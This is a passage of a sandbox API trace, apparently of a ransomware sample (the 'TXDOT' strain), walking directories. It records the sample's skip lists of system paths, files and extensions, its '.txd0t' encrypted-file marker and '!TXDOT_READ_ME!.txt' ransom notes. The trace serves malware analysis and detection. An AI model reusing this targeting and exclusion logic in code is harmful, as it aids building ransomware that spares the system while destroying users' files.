(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0114.149] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0114.149] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0114.149] GetProcessHeap () returned 0xe30000 [0114.149] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0114.149] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580e8bbd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580e8bbd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1028", cAlternateFileName="")) returned 1 [0114.149] StrCmpW (psz1="1028", psz2=".") returned 1 [0114.149] StrCmpW (psz1="1028", psz2="..") returned 1 [0114.149] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.149] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0114.149] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1028", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system32\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\local\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\boot\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\perflogs\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\programdata\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\drivers\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\wsus\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="crypt_detect") returned 0x0 [0114.149] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="cryptolocker") returned 0x0 [0114.150] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="ransomware") returned 0x0 [0114.150] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\WINDOWS") returned 0x0 [0114.150] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.150] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files") returned 0x0 [0114.150] GetProcessHeap () returned 0xe30000 [0114.150] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0114.150] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0114.150] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\*") returned="C:\\588bce7c90097ed212\\1028\\*" [0114.150] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580e8bbd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580e8bbd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e70 [0114.150] StrCmpW (psz1=".", psz2=".") returned 0 [0114.150] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580e8bbd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580e8bbd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.150] StrCmpW (psz1="..", psz2=".") returned 1 [0114.150] StrCmpW (psz1="..", psz2="..") returned 0 [0114.150] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57f1ef3a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57f1ef3a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57f45136, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.150] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.150] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.150] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0114.150] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0114.150] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1028\\!TXDOT_READ_ME!.txt" [0114.150] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.150] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.150] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.151] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.151] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.151] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.151] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.151] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.151] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.151] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x57f1ef3a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1aa5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0114.151] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0114.151] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0114.151] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0114.151] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0114.151] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t" [0114.151] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0114.151] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.151] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x580c28ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0114.151] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0114.151] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0114.151] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0114.151] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0114.151] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t" [0114.151] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0114.151] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.151] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0114.151] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0114.151] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0114.151] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0114.151] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0114.151] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" [0114.151] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.151] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0114.151] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0114.151] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0114.151] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0114.151] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0114.151] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0114.152] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.152] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.152] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0114.152] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0114.152] FindClose (in: hFindFile=0xec1e70 | out: hFindFile=0xec1e70) returned 1 [0114.152] GetProcessHeap () returned 0xe30000 [0114.152] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0114.152] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1029", cAlternateFileName="")) returned 1 [0114.152] StrCmpW (psz1="1029", psz2=".") returned 1 [0114.152] StrCmpW (psz1="1029", psz2="..") returned 1 [0114.152] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.152] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0114.152] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1029", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system32\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\local\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\boot\\") returned 0x0 [0114.152] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\perflogs\\") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\programdata\\") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\drivers\\") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\wsus\\") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="crypt_detect") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="cryptolocker") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="ransomware") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\WINDOWS") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.153] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files") returned 0x0 [0114.153] GetProcessHeap () returned 0xe30000 [0114.153] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0114.153] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0114.153] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\*") returned="C:\\588bce7c90097ed212\\1029\\*" [0114.153] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bf0 [0114.153] StrCmpW (psz1=".", psz2=".") returned 0 [0114.153] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.153] StrCmpW (psz1="..", psz2=".") returned 1 [0114.153] StrCmpW (psz1="..", psz2="..") returned 0 [0114.153] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5810ed51, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5810ed51, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58134fc1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.153] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.153] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.153] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0114.153] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0114.153] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1029\\!TXDOT_READ_ME!.txt" [0114.153] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.153] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.153] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.153] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.154] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.154] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5810ed51, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x108e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0114.154] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0114.154] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0114.154] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0114.154] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0114.154] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t" [0114.154] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0114.154] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.154] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: 